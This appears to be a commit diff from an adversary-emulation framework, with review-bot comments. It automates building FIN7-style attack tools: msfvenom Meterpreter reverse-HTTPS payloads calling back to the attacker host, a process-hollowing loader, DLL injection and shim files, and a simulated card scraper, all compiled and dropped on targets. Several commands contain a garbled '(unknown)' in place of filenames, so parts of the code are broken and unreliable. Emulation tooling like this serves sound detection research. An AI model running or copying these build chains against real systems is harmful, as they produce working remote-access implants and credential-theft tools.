Added tool building step to human readable log

pull/11/head
Thorsten Sick 3 years ago
parent 474a2ea185
commit 771b4bc5e2

@ -344,6 +344,63 @@ class AttackLog():
self.__add_to_log__(data)
return logid
def start_build(self, **kwargs):
""" Mark the start of a tool building/compilation process
@param source: source of the attack. Attack IP
@param target: Target machine of the attack
@param attack_name: Name of the attack. From plugin
@param ttp: TTP of the attack. From plugin
"""
timestamp = self.__get_timestamp__()
logid = timestamp + "_" + str(randint(1, 100000))
data = {"timestamp": timestamp,
"timestamp_end": None,
"event": "start",
"type": "build",
# "sub_type": "",
"logid": logid,
"dl_uri": kwargs.get("dl_uri", None),
"dl_uris": kwargs.get("dl_uris", None),
"payload": kwargs.get("payload", None),
"platform": kwargs.get("platform", None),
"architecture": kwargs.get("architecture", None),
"lhost": kwargs.get("lhost", None),
"lport": kwargs.get("lport", None),
"filename": kwargs.get("filename", None),
"encoding": kwargs.get("encoding", None),
"encoded_filename": kwargs.get("encoded_filename", None),
"sRDI_conversion": kwargs.get("sRDI_conversion", False),
"for_step": kwargs.get("for_step", None),
"comment": kwargs.get("comment", None),
}
self.__add_to_log__(data)
return logid
# TODO: Add parameter
# TODO: Add config
# TODO: Add results
def stop_build(self, **kwargs):
""" Mark the end of a tool building/compilation process
@param source: source of the attack. Attack IP
@param target: Target machine of the attack
@param attack_name: Name of the attack. From plugin
@param ttp: TTP of the attack. From plugin
"""
data = {"timestamp": self.__get_timestamp__(),
"event": "stop",
"type": "build",
# "sub_type": "",
"logid": kwargs.get("logid", None)
}
self.__add_to_log__(data)
def start_metasploit_attack(self, source, target, metasploit_command, ttp=None, **kwargs):
""" Mark the start of a Metasploit based attack

@ -183,6 +183,7 @@ class Experiment():
target_1.halt()
self.__stop_attacker()
self.attack_logger.post_process()
self.attack_logger.write_json(os.path.join(self.lootdir, "attack.json"))
self.zip_loot(zip_this)

@ -31,8 +31,11 @@ if __name__ == "__main__":
# generate("loot/2021_07_19___16_28_45/attack.json", "tools/human_readable_documentation/contents.rst") # Working example for a short run
# generate("loot/2021_07_20___08_26_33/attack.json", "tools/human_readable_documentation/contents.rst") # FIN 7 #1
# generate("loot/2021_07_20___10_07_36/attack.json", "tools/human_readable_documentation/contents.rst") # FIN 7 #2 The one Fabrizio got
generate("loot/2021_07_28___12_09_00/attack.json",
"tools/human_readable_documentation/contents.rst") # FIN 7 The last minute locally generated thing
#generate("loot/2021_07_28___12_09_00/attack.json",
# "tools/human_readable_documentation/contents.rst") # FIN 7 The last minute locally generated thing
generate("loot/2021_08_30___14_40_23/attack.json",
"tools/human_readable_documentation/contents.rst") # FIN 7 With genereated files added
# generate("loot/2021_07_19___15_10_45/attack.json", "tools/human_readable_documentation/contents.rst")
# generate("removeme.json", "tools/human_readable_documentation/contents.rst")

@ -178,12 +178,39 @@ In this simulation sql-rat.js communication will be replaced by Caldera communic
# Generate shellcode
# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=443 EXITFUNC=thread -f C --encrypt xor --encrypt-key m
dl_uri = "https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step4/babymetal/babymetal.cpp"
architecture = "x64"
target_platform = "windows"
payload = self.payload_type_1
lhost = self.attacker_machine_plugin.get_ip()
lport = "443"
filename = "babymetal.dll"
encoding = "base64"
encoded_filename = "babymetal_encoded.txt"
sRDI_conversion = True
for_step = 4
logid = self.attack_logger.start_build(dl_uri=dl_uri,
architecture=architecture,
target_platform=target_platform,
payload=payload,
lhost=lhost,
lport=lport,
filename=filename,
encoding=encoding,
encoded_filename=encoded_filename,
sRDI_conversion=sRDI_conversion,
for_step=for_step,
comment="This is the stager uploaded to the target and executed to get the first Meterpreter shell on the target network.")
venom = MSFVenom(self.attacker_machine_plugin, hotelmanager, self.attack_logger)
venom.generate_payload(payload=self.payload_type_1,
architecture="x64",
platform="windows",
lhost=self.attacker_machine_plugin.get_ip(),
lport="443",
venom.generate_payload(payload=payload,
architecture=architecture,
platform=target_platform,
lhost=lhost,
lport=lport,
exitfunc="thread",
format="c",
encrypt="xor",
@ -194,7 +221,7 @@ In this simulation sql-rat.js communication will be replaced by Caldera communic
# get C source
self.attacker_machine_plugin.remote_run(
"cd tool_factory/step_4; rm babymetal.cpp; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step4/babymetal/babymetal.cpp")
f"cd tool_factory/step_4; rm babymetal.cpp; wget {dl_uri}")
# paste shellcode into C source
self.attacker_machine_plugin.remote_run(
@ -203,13 +230,15 @@ In this simulation sql-rat.js communication will be replaced by Caldera communic
# Compile to DLL
self.attacker_machine_plugin.remote_run("cd tool_factory/step_4; sed -i 's/#include <Windows.h>/#include <windows.h>/g' babymetal_patched.cpp")
self.attacker_machine_plugin.remote_run(
"cd tool_factory/step_4;x86_64-w64-mingw32-g++ -shared babymetal_patched.cpp -o babymetal.dll")
f"cd tool_factory/step_4;x86_64-w64-mingw32-g++ -shared babymetal_patched.cpp -o (unknown)")
# sRDI conversion
self.attacker_machine_plugin.remote_run("cd tool_factory/; python3 sRDI/Python/ConvertToShellcode.py -f BabyMetal step_4/babymetal.dll")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/; python3 sRDI/Python/ConvertToShellcode.py -f BabyMetal step_4/(unknown)")
# base64 conversion
self.attacker_machine_plugin.remote_run("cd tool_factory/step_4; base64 babymetal.bin > babymetal_encoded.txt")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_4; base64 babymetal.bin > {encoded_filename}")
self.attack_logger.stop_build(logid = logid)
self.attack_logger.vprint(
f"{CommandlineColors.OKGREEN}Step 4 compiling tools{CommandlineColors.ENDC}", 1)
@ -381,14 +410,33 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp
# --encrypt xor : xor encrypt the results
# --encrypt-key m : the encryption key
dl_uri = "https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step6/Hollow/ProcessHollowing.c"
payload = self.payload_type_1
architecture = "x64"
target_platform = "windows"
lhost = self.attacker_machine_plugin.get_ip()
lport = "443"
filename = "hollow.exe"
for_step = 6
logid = self.attack_logger.start_build(dl_uri=dl_uri,
architecture=architecture,
target_platform=target_platform,
payload=payload,
lhost=lhost,
lport=lport,
filename=filename,
for_step=for_step,
comment="This will be copied using paexec to the it admin host. It will spawn svchost.exe there and create a first Meterpreter shell on this PC.")
# Generate shellcode
# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=443 -f exe -o msf.exe
venom = MSFVenom(self.attacker_machine_plugin, hotelmanager, self.attack_logger)
venom.generate_payload(payload=self.payload_type_1,
architecture="x64",
platform="windows",
lhost=self.attacker_machine_plugin.get_ip(),
lport="443",
venom.generate_payload(payload=payload,
architecture=architecture,
platform=target_platform,
lhost=lhost,
lport=lport,
format="exe",
outfile="msf.executable")
@ -399,7 +447,7 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp
# Get ProcessHollowing.c
self.attacker_machine_plugin.remote_run(
"cd tool_factory/step_6; rm ProcessHollowing.c; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step6/Hollow/ProcessHollowing.c")
f"cd tool_factory/step_6; rm ProcessHollowing.c; wget {dl_uri}")
self.attacker_machine_plugin.remote_run(
"cd tool_factory/step_6; sed -i 's/#include <Windows.h>/#include <windows.h>/g' ProcessHollowing.c")
@ -414,7 +462,9 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp
# Compiled for 64 bit.
self.attacker_machine_plugin.remote_run("cd tool_factory/step_6; rm hollow.exe;")
self.attacker_machine_plugin.remote_run("cd tool_factory/step_6; x86_64-w64-mingw32-gcc -municode -D UNICODE -D _UNICODE ProcessHollowing.c -L/usr/x86_64-w64-mingw32/lib/ -l:libntdll.a -o hollow.exe")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_6; x86_64-w64-mingw32-gcc -municode -D UNICODE -D _UNICODE ProcessHollowing.c -L/usr/x86_64-w64-mingw32/lib/ -l:libntdll.a -o (unknown)")
self.attack_logger.stop_build(logid=logid)
self.attack_logger.vprint(
f"{CommandlineColors.OKGREEN}Step 6 compiling tools{CommandlineColors.ENDC}", 1)
@ -555,13 +605,34 @@ NOT IMPLEMENTED YET. MAYBE DO THIS PARTIAL. KEYLOGGING NEEDS USER INTERACTION.
accounting = self.get_target_by_name("accounting")
self.attacker_machine_plugin.remote_run("mkdir tool_factory/step_9")
payload = "windows/meterpreter/reverse_https"
filename = "dll329.dll"
for_step = 9
architecture = "x86"
target_platform = "windows"
lhost = self.attacker_machine_plugin.get_ip()
lport = "53"
sRDI_conversion = True
encoded_filename = "bin329.tmp"
logid = self.attack_logger.start_build(architecture=architecture,
target_platform=target_platform,
payload=payload,
lhost=lhost,
lport=lport,
filename=filename,
for_step=for_step,
sRDI_conversion= sRDI_conversion,
encoded_filename=encoded_filename,
comment="And SRDI converted Meterpreter shell. Will be stored in the registry.")
# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=53 -f dll -o payload.dll
venom = MSFVenom(self.attacker_machine_plugin, accounting, self.attack_logger)
venom.generate_payload(payload="windows/meterpreter/reverse_https",
architecture="x86",
platform="windows",
lhost=self.attacker_machine_plugin.get_ip(),
lport="53",
venom.generate_payload(payload=payload,
architecture=architecture,
platform=target_platform,
lhost=lhost,
lport=lport,
format="dll",
outfile="payload.dll")
@ -570,29 +641,50 @@ NOT IMPLEMENTED YET. MAYBE DO THIS PARTIAL. KEYLOGGING NEEDS USER INTERACTION.
self.attacker_machine_plugin.remote_run("cd tool_factory/; python3 sRDI/Python/ConvertToShellcode.py step_9/payload.dll")
# mv payload.bin bin329.tmp
self.attacker_machine_plugin.remote_run("cp tool_factory/step_9/payload.bin tool_factory/step_9/bin329.tmp")
self.attacker_machine_plugin.remote_run(f"cp tool_factory/step_9/payload.bin tool_factory/step_9/{encoded_filename}")
# This will be stored in the registry
self.attack_logger.stop_build(logid=logid)
# ## DLL 329
# Build https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/fin7/Resources/Step9/InjectDLL-Shim
dl_uris = ["https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step9/InjectDLL-Shim/dllmain.cpp",
"https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step9/InjectDLL-Shim/pe.cpp",
"https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step9/InjectDLL-Shim/pe.h"]
filename = "dll329.dll"
for_step = 9
logid = self.attack_logger.start_build(dl_uris=dl_uris,
filename=filename,
for_step=for_step,
comment="Will be injected into the AccoutingIQ executable.")
self.attacker_machine_plugin.remote_run(
"cd tool_factory/step_9; rm dllmain.cpp")
self.attacker_machine_plugin.remote_run("cd tool_factory/step_9; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step9/InjectDLL-Shim/dllmain.cpp")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_9; wget {dl_uris[0]}")
self.attacker_machine_plugin.remote_run("cd tool_factory/step_9; rm pe.cpp;")
self.attacker_machine_plugin.remote_run("cd tool_factory/step_9; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step9/InjectDLL-Shim/pe.cpp")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_9; wget {dl_uris[1]}")
self.attacker_machine_plugin.remote_run("cd tool_factory/step_9; rm pe.h;")
self.attacker_machine_plugin.remote_run("cd tool_factory/step_9; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step9/InjectDLL-Shim/pe.h")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_9; wget {dl_uris[2]}")
# Compiling dll 329
self.attacker_machine_plugin.remote_run("cd tool_factory/step_9; rm dll329.dll;")
self.attacker_machine_plugin.remote_run("cd tool_factory/step_9; i686-w64-mingw32-g++ -m32 -shared -municode -D UNICODE -D _UNICODE -fpermissive dllmain.cpp pe.cpp -L/usr/i686-w64-mingw32/lib/ -l:libntoskrnl.a -l:libntdll.a -o dll329.dll")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_9; rm (unknown);")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_9; i686-w64-mingw32-g++ -m32 -shared -municode -D UNICODE -D _UNICODE -fpermissive dllmain.cpp pe.cpp -L/usr/i686-w64-mingw32/lib/ -l:libntoskrnl.a -l:libntdll.a -o (unknown)")
self.attack_logger.stop_build(logid=logid)
# ## sdbE376.tmp
dl_uri = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/fin7/Resources/Step9/sdbE376.tmp"
filename = "sdbE376.tmp"
logid = self.attack_logger.start_build(dl_uri=dl_uri,
filename=filename,
for_step=9,
comment="An SDB Shim database file. Will be installed for application shimming.")
# Just download https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/fin7/Resources/Step9/sdbE376.tmp
self.attacker_machine_plugin.remote_run("cd tool_factory/step_9; rm sdbE376.tmp")
self.attacker_machine_plugin.remote_run("cd tool_factory/step_9; wget https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/fin7/Resources/Step9/sdbE376.tmp")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_9; rm (unknown)")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_9; wget {dl_uri}")
self.attack_logger.stop_build(logid=logid)
self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Step 9 compiling tools{CommandlineColors.ENDC}", 1)
@ -627,6 +719,8 @@ NOT IMPLEMENTED YET
self.attack_logger.vprint(
f"{CommandlineColors.OKBLUE}Step 10 compiling tools{CommandlineColors.ENDC}", 1)
accounting = self.get_target_by_name("accounting")
# Compiling
# i686-w64-mingw32-gcc is for 32 bit
@ -634,33 +728,50 @@ NOT IMPLEMENTED YET
# Important: pillowMint is not very complex and looks for the data at a fixed address. As we a re-compiling AccountIQ.exe and the data address does not match the expected one we will just get garbage.
filename = "AccountingIQ.exe"
dl_uri = "https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step10/AccountingIQ.c"
logid = self.attack_logger.start_build(
filename=filename,
for_step=10,
dl_uri=dl_uri,
comment="This is a simulated credit card tool to target. The final flag is in here.")
# simulated credit card tool as target
self.attacker_machine_plugin.remote_run("mkdir tool_factory/step_10") # MSFVenom needs to be installed
self.attacker_machine_plugin.remote_run("cd tool_factory/step_10; rm AccountingIQ.exe")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_10; rm (unknown)")
self.attacker_machine_plugin.remote_run(
"cd tool_factory/step_10; rm AccountingIQ.c; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step10/AccountingIQ.c")
"cd tool_factory/step_10; rm AccountingIQ.c; wget {dl_uri}")
self.attacker_machine_plugin.remote_run(
"cd tool_factory/step_10; i686-w64-mingw32-gcc -m32 -L/usr/i686-w64-mingw32/lib -I/usr/i686-w64-mingw32/include AccountingIQ.c -o AccountingIQ.exe")
f"cd tool_factory/step_10; i686-w64-mingw32-gcc -m32 -L/usr/i686-w64-mingw32/lib -I/usr/i686-w64-mingw32/include AccountingIQ.c -o (unknown)")
self.attacker_machine_plugin.get("tool_factory/step_10/AccountingIQ.exe",
self.attacker_machine_plugin.get(f"tool_factory/step_10/(unknown)",
os.path.join(os.path.dirname(self.plugin_path), "resources", "step10",
"AccountingIQ.exe"))
filename))
accounting.put(os.path.join(os.path.dirname(self.plugin_path), "resources", "step10", filename),
filename)
self.attack_logger.stop_build(logid=logid)
# Simulated credit card scraper
self.attacker_machine_plugin.remote_run("cd tool_factory/step_10; rm pillowMint.exe")
filename = "pillowMint.exe"
dl_uri = "https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step10/pillowMint.cpp"
logid = self.attack_logger.start_build(
filename=filename,
for_step=10,
dl_uri=dl_uri,
comment="This is a simulated credit card data scraper.")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_10; rm (unknown)")
self.attacker_machine_plugin.remote_run(
"cd tool_factory/step_10; rm pillowMint.cpp; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step10/pillowMint.cpp")
f"cd tool_factory/step_10; rm pillowMint.cpp; wget {dl_uri}")
self.attacker_machine_plugin.remote_run(
"cd tool_factory/step_10; x86_64-w64-mingw32-g++ -static pillowMint.cpp -o pillowMint.exe")
self.attacker_machine_plugin.get("tool_factory/step_10/pillowMint.exe",
f"cd tool_factory/step_10; x86_64-w64-mingw32-g++ -static pillowMint.cpp -o (unknown)")
self.attacker_machine_plugin.get(f"tool_factory/step_10/(unknown)",
os.path.join(os.path.dirname(self.plugin_path), "resources", "step10",
"pillowMint.exe"))
filename))
accounting = self.get_target_by_name("accounting")
accounting.put(os.path.join(os.path.dirname(self.plugin_path), "resources", "step10", "pillowMint.exe"),
"pillowMint.exe")
accounting.put(os.path.join(os.path.dirname(self.plugin_path), "resources", "step10", "AccountingIQ.exe"),
"AccountingIQ.exe")
accounting.put(os.path.join(os.path.dirname(self.plugin_path), "resources", "step10", filename),
filename)
self.attack_logger.stop_build(logid=logid)
self.attack_logger.vprint(
f"{CommandlineColors.OKGREEN}Step 10 compiling tools{CommandlineColors.ENDC}", 1)
@ -725,7 +836,7 @@ NOT IMPLEMENTED YET. NEEDS TARGET REBOOTING: NO IDEA IF ATTACKX CAN SUPPORT THAT
# Those build calls will be called from the steps directly. But it is always conveniet for testing to use that now directly while developing
# Building the tools is temporarily de-activated. Without the proper environment the tools being built are useless. Many attacks run on temporary attacks
if False:
if True:
self.build_step4() # DONE
self.build_step6() # DONE
# TODO: self.build_step7() # Will not be done until the environment is planned. This step needs Aloha Command Center on the target. Maybe we write our own vulnerable app....
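Review bot: Flipping `if False:` to `if True:` re-enables the tool builds but leaves the comment lines directly above stating that building is "temporarily de-activated", so the code now contradicts its own explanation. Either delete the stale comment or, better, replace the literal with a configuration or CLI flag, e.g. `if self.build_tools:`, so the behaviour is chosen per run rather than by editing source. The enclosing method starts outside the hunk.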

@ -6,100 +6,115 @@ Target systems
Attack steps
------------
{% for e in events %}
{% if e.event is eq("start") %}
{% if e.type is eq("dropping_file") %}
Dropping file to target
~~~~~~~~~~~~~~~~~~~~~~~
At {{ e.timestamp }}
The file {{ e.file_name }} is dropped to the target {{ e.target }}.
{% endif %}
{% if e.type is eq("execute_payload") %}
Executing payload on target
~~~~~~~~~~~~~~~~~~~~~~~~~~~
At {{ e.timestamp }}
The command {{ e.command }} is used to start a file on the target {{ e.target }}.
{% endif %}
{% if e.type is eq("narration") %}
{{ e.text }}
{% endif %}
{% if e.sub_type is eq("metasploit") %}
Metasploit attack {{ e.name }}
~~~~~~~~~~~~~~~~~~~~~~~~~~
Tactics: {{ e.tactics }}
Tactics ID: {{ e.tactics_id }}
Hunting Tag: {{ e.hunting_tag}}
At {{ e.timestamp }} a Metasploit command {{ e.name }} was used to attack {{ e.target }} from {{ e.source }}.
{{ e.description }}
{% if e.metasploit_command is string() %}
Metasploit command: {{ e.metasploit_command }}
{% endif %}
{% if e.situation_description is string() %}
Situation: {{ e.situation_description }}
{% endif %}
{% if e.countermeasure is string() %}
Countermeasure: {{ e.countermeasure }}
{% endif %}
{% endif %}
{% if e.sub_type is eq("kali") %}
Kali attack {{ e.name }}
~~~~~~~~~~~~~~~~~~~~~~~~~~
Tactics: {{ e.tactics }}
Tactics ID: {{ e.tactics_id }}
Hunting Tag: {{ e.hunting_tag}}
At {{ e.timestamp }} a Kali command {{ e.kali_name }} was used to attack {{ e.target }} from {{ e.source }}.
{{ e.description }}
{% if e.kali_command is string() %}
Kali command: {{ e.kali_command }}
{% endif %}
{% if e.situation_description is string() %}
Situation: {{ e.situation_description }}
{% endif %}
{% if e.countermeasure is string() %}
Countermeasure: {{ e.countermeasure }}
{% endif %}
{% endif %}
{% if e.sub_type is eq("caldera") %}
Caldera attack {{ e.name }}
~~~~~~~~~~~~~~~~~~~~~~~~~~
Tactics: {{ e.tactics }}
Tactics ID: {{ e.tactics_id }}
Hunting Tag: {{ e.hunting_tag}}
At {{ e.timestamp }} a Caldera ability {{ e.ability_id }}/"{{ e.name }}" was used to attack the group {{ e.target_group }} from {{ e.source }}.
{{ e.description }}
{% if e.situation_description is string() %}
Situation: {{ e.situation_description }}
{% endif %}
{% if e.countermeasure is string() %}
Countermeasure: {{ e.countermeasure }}
{% endif %}
{% endif %}
{% endif %} {# event equal start #}
{% endfor %}
Tools
-----
{% for e in events %}
{% if e.event is eq("start") %}
{% if e.type is eq("build") %}
Building tool {{ e.filename }}
~~~~~~~~~~~~~~~~~~~~~~~
The file {{ e.filename }} is built
{% if e.for_step %}
It will be used in Step {{ e.for_step }}
{% endif %}
Build time is between {{ e.timestamp }} and {{ e.timestamp_end }}
{% if e.dl_uri is string() %}
Built from source downloaded from {{ e.dl_uri }}
{% endif %}
{% if e.dl_uris %}
Built from sources downloaded from
{% for i in e.dl_uris %}
* {{ i }}
{% endfor %}
{% endif %}
{% if e.payload is string() %}
The attack tool uses a Meterpreter payload. The payload is {{ e.payload }}. The payload is built for the {{ e.platform }} platform and the {{ e.architecture }} architecture.
The settings for lhost and lport are {{ e.lhost }}/{{ e.lport }}.
{% endif %}
{% if e.encoding is string() %}
The file was encoded using {{ e.encoding }} after compilation.
{% endif %}
{% if e.encoded_filename is string() %}
The encoded version is named {{ e.encoded_filename }}.
{% endif %}
{% if e.SRDI_conversion %}
The attack tool was converted to position independent shellcode. See: https://github.com/monoxgas/sRDI
{% endif %}
{{ e.comment }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %} {# event equal start #}
{% endfor %}
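Review bot: The new Tools section tests `{% if e.SRDI_conversion %}` while start_build writes the key as `sRDI_conversion`; Jinja treats the missing attribute as undefined and falsy, so the sRDI line never renders even when the flag is True — change it to `{% if e.sRDI_conversion %}`. `{{ e.platform }}` in the payload sentence will likewise print None for the records produced by this commit, because the build steps pass `target_platform` and start_build stores `platform`. `{{ e.timestamp_end }}` is initialised to None in start_build; unless `post_process()` (not shown here) back-fills it from the matching stop record, the "Build time is between" line prints None, which is worth confirming. The trailing `{% endif %} {# event equal start #}` / `{% endfor %}` pair at the very end looks like leftover closers: if those two lines are on the new side the template has unbalanced tags and will fail to load and should be removed; if they are the removed old lines, the page merely displays them after the additions.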